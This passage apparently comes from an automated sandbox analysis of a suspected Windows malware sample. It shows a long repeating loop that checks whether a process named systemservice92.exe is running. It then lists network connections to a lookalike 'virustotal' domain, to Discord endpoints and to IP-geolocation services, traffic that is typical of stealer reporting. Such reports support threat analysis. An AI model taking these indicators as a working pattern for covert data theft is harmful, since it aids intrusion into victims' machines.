find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 virustotal.neocities.org udp
US 198.51.233.2:443 virustotal.neocities.org tcp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 162.159.137.232:443 discord.com tcp
US 198.51.233.2:443 virustotal.neocities.org tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
US 172.67.74.152:443 api.ipify.org tcp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.134.234:443 gateway.discord.gg tcp
US 104.237.62.213:443 api64.ipify.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
N/A 127.0.0.1:53586 tcp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.178.14:443 www.youtube.com udp
US 8.8.8.8:53 rr1---sn-aigzrnze.googlevideo.com udp
GB 142.250.179.246:443 i.ytimg.com tcp
GB 74.125.175.230:443 rr1---sn-aigzrnze.googlevideo.com tcp
GB 74.125.175.230:443 rr1---sn-aigzrnze.googlevideo.com tcp
US 8.8.8.8:53 246.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 230.175.125.74.in-addr.arpa udp
GB 142.250.179.246:443 i.ytimg.com udp
BE 142.251.173.84:443 accounts.google.com tcp
BE 142.251.173.84:443 accounts.google.com udp
GB 142.250.187.196:443 www.google.com tcp
AU 74.125.152.8:443 rr3---sn-ntqe6nes.googlevideo.com udp
GB 216.58.213.10:443 jnn-pa.googleapis.com tcp
AU 74.125.152.8:443 rr3---sn-ntqe6nes.googlevideo.com tcp
AU 74.125.152.8:443 rr3---sn-ntqe6nes.googlevideo.com tcp
GB 216.58.213.10:443 jnn-pa.googleapis.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 172.217.16.225:443 yt3.ggpht.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 216.58.213.14:443 youtube.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.179.238:443 play.google.com udp
GB 88.221.134.2:443 www.bing.com tcp
GB 88.221.134.2:443 www.bing.com tcp
GB 88.221.135.19:443 th.bing.com tcp
GB 88.221.135.19:443 th.bing.com tcp
GB 88.221.135.24:443 th.bing.com tcp
GB 88.221.135.24:443 th.bing.com tcp
NL 40.126.32.136:443 login.microsoftonline.com tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
GB 142.250.178.14:443 www.youtube.com udp

Files

